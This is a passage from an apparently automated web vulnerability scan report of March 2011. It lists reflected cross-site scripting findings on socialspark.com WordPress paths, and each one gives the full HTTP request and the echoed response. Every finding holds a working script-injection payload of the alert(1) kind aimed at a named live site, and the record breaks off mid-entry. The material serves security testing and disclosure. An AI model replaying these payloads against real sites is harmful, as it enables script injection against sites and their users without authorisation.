Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:45:38 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/javascripts/jquery.js?26d6d\"><script>alert(1)</script>198557de060=1"/>
...[SNIP]...

1.154. http://socialspark.com/wp-content/plugins/contact-form-7/scripts.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/wp-content/plugins/contact-form-7/scripts.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7c7c"><script>alert(1)</script>c0338b1c469 was submitted in the REST URL parameter 1. This input was echoed as a7c7c\"><script>alert(1)</script>c0338b1c469 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contenta7c7c"><script>alert(1)</script>c0338b1c469/plugins/contact-form-7/scripts.js?ver=2.3 HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3Eb4a78946341/claimdot.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:47:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:47:56 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12138

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/wp-contenta7c7c\"><script>alert(1)</script>c0338b1c469/plugins/contact-form-7/scripts.js?ver=2.3"/>
...[SNIP]...

1.155. http://socialspark.com/wp-content/plugins/contact-form-7/scripts.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/wp-content/plugins/contact-form-7/scripts.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cbf9"><script>alert(1)</script>a21c450c80b was submitted in the REST URL parameter 2. This input was echoed as 8cbf9\"><script>alert(1)</script>a21c450c80b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins8cbf9"><script>alert(1)</script>a21c450c80b/contact-form-7/scripts.js?ver=2.3 HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3Eb4a78946341/claimdot.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:48:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:48:45 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12138

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/wp-content/plugins8cbf9\"><script>alert(1)</script>a21c450c80b/contact-form-7/scripts.js?ver=2.3"/>
...[SNIP]...

1.156. http://socialspark.com/wp-content/plugins/contact-form-7/scripts.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/wp-content/plugins/contact-form-7/scripts.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c962"><script>alert(1)</script>ed881c027d4 was submitted in the REST URL parameter 3. This input was echoed as 7c962\"><script>alert(1)</script>ed881c027d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/contact-form-77c962"><script>alert(1)</script>ed881c027d4/scripts.js?ver=2.3 HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3Eb4a78946341/claimdot.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:49:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:49:46 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12138

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/wp-content/plugins/contact-form-77c962\"><script>alert(1)</script>ed881c027d4/scripts.js?ver=2.3"/>
...[SNIP]...

1.157. http://socialspark.com/wp-content/plugins/contact-form-7/scripts.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/wp-content/plugins/contact-form-7/scripts.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d871"><script>alert(1)</script>0f6e3b3f32e was submitted in the REST URL parameter 4. This input was echoed as 7d871\"><script>alert(1)</script>0f6e3b3f32e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/contact-form-7/scripts.js7d871"><script>alert(1)</script>0f6e3b3f32e?ver=2.3 HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3Eb4a78946341/claimdot.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:49:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:49:58 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12138

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/wp-content/plugins/contact-form-7/scripts.js7d871\"><script>alert(1)</script>0f6e3b3f32e?ver=2.3"/>
...[SNIP]...

1.158. http://socialspark.com/wp-content/plugins/contact-form-7/styles.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/wp-content/plugins/contact-form-7/styles.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dab2c"><script>alert(1)</script>8091f8658f3 was submitted in the REST URL parameter 1. This input was echoed as dab2c\"><script>alert(1)</script>8091f8658f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contentdab2c"><script>alert(1)</script>8091f8658f3/plugins/contact-form-7/styles.css?ver=2.3 HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3Eb4a78946341/claimdot.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:47:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:47:01 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12138

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/wp-contentdab2c\"><script>alert(1)</script>8091f8658f3/plugins/contact-form-7/styles.css?ver=2.3"/>
...[SNIP]...

1.159. http://socialspark.com/wp-content/plugins/contact-form-7/styles.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/wp-content/plugins/contact-form-7/styles.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6092"><script>alert(1)</script>cf47ca80c6e was submitted in the REST URL parameter 2. This input was echoed as b6092\"><script>alert(1)</script>cf47ca80c6e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginsb6092"><script>alert(1)</script>cf47ca80c6e/contact-form-7/styles.css?ver=2.3 HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3Eb4a78946341/claimdot.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:47:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:47:28 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12138

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/wp-content/pluginsb6092\"><script>alert(1)</script>cf47ca80c6e/contact-form-7/styles.css?ver=2.3"/>
...[SNIP]...

1.160. http://socialspark.com/wp-content/plugins/contact-form-7/styles.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/wp-content/plugins/contact-form-7/styles.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40a38"><script>alert(1)</script>b071d25301f was submitted in the REST URL parameter 3. This input was echoed as 40a38\"><script>alert(1)</script>b071d25301f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/contact-form-740a38"><script>alert(1)</script>b071d25301f/styles.css?ver=2.3 HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3Eb4a78946341/claimdot.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:48:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:48:06 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12138

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/wp-content/plugins/contact-form-740a38\"><script>alert(1)</script>b071d25301f/styles.css?ver=2.3"/>
...[SNIP]...

1.161. http://socialspark.com/wp-content/plugins/contact-form-7/styles.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/wp-content/plugins/contact-form-7/styles.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba76b"><script>alert(1)</script>0511c1851e was submitted in the REST URL parameter 4. This input was echoed as ba76b\"><script>alert(1)</script>0511c1851e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/contact-form-7/styles.cssba76b"><script>alert(1)</script>0511c1851e?ver=2.3 HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3Eb4a78946341/claimdot.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:48:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:48:56 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/wp-content/plugins/contact-form-7/styles.cssba76b\"><script>alert(1)</script>0511c1851e?ver=2.3"/>
...[SNIP]...

1.162. http://socialspark.com/wp-content/plugins/sociable/sociable.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/wp-content/plugins/sociable/sociable.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8633d"><script>alert(1)</script>fa573192f25 was submitted in the REST URL parameter 1. This input was echoed as 8633d\"><script>alert(1)</script>fa573192f25 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content8633d"><script>alert(1)</script>fa573192f25/plugins/sociable/sociable.css?ver=3.0.1 HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3Eb4a78946341/claimdot.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:47:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:47:02 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12134

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/wp-content8633d\"><script>alert(1)</script>fa573192f25/plugins/sociable/sociable.css?ver=3.0.1"/>
...[SNIP]...

1.163. http://socialspark.com/wp-content/plugins/sociable/sociable.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/wp-content/plugins/sociable/sociable.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15ef3"><script>alert(1)</script>99fc9611e31 was submitted in the REST URL parameter 2. This input was echoed as 15ef3\"><script>alert(1)</script>99fc9611e31 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins15ef3"><script>alert(1)</script>99fc9611e31/sociable/sociable.css?ver=3.0.1 HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3Eb4a78946341/claimdot.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:47:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:47:31 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12134

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/wp-content/plugins15ef3\"><script>alert(1)</script>99fc9611e31/sociable/sociable.css?ver=3.0.1"/>
...[SNIP]...

1.164. http://socialspark.com/wp-content/plugins/sociable/sociable.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/wp-content/plugins/sociable/sociable.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2019"><script>alert(1)</script>d88d90d026 was submitted in the REST URL parameter 3. This input was echoed as a2019\"><script>alert(1)</script>d88d90d026 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sociablea2019"><script>alert(1)</script>d88d90d026/sociable.css?ver=3.0.1 HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3Eb4a78946341/claimdot.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:48:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:48:10 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/wp-content/plugins/sociablea2019\"><script>alert(1)</script>d88d90d026/sociable.css?ver=3.0.1"/>
...[SNIP]...

1.165. http://socialspark.com/wp-content/plugins/sociable/sociable.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/wp-content/plugins/sociable/sociable.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fb57"><script>alert(1)</script>512627ef50a was submitted in the REST URL parameter 4. This input was echoed as 4fb57\"><script>alert(1)</script>512627ef50a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sociable/sociable.css4fb57"><script>alert(1)</script>512627ef50a?ver=3.0.1 HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3Eb4a78946341/claimdot.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:49:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:49:08 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12134

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/wp-content/plugins/sociable/sociable.css4fb57\"><script>alert(1)</script>512627ef50a?ver=3.0.1"/>
...[SNIP]...

1.166. http://socialspark.com/wp-content/themes/izea/img/500.jpg [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/wp-content/themes/izea/img/500.jpg

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2e9a"><script>alert(1)</script>88ff1b06e8a was submitted in the REST URL parameter 1. This input was echoed as c2e9a\"><script>alert(1)</script>88ff1b06e8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contentc2e9a"><script>alert(1)</script>88ff1b06e8a/themes/izea/img/500.jpg HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3Eb4a78946341/claimdot.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:47:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:47:13 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12102

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/wp-contentc2e9a\"><script>alert(1)</script>88ff1b06e8a/themes/izea/img/500.jpg"/>
...[SNIP]...

1.167. http://socialspark.com/wp-content/themes/izea/img/500.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/wp-content/themes/izea/img/500.jpg

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3464e"><script>alert(1)</script>de8a601c5a5 was submitted in the REST URL parameter 2. This input was echoed as 3464e\"><script>alert(1)</script>de8a601c5a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes3464e"><script>alert(1)</script>de8a601c5a5/izea/img/500.jpg HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3Eb4a78946341/claimdot.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:47:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
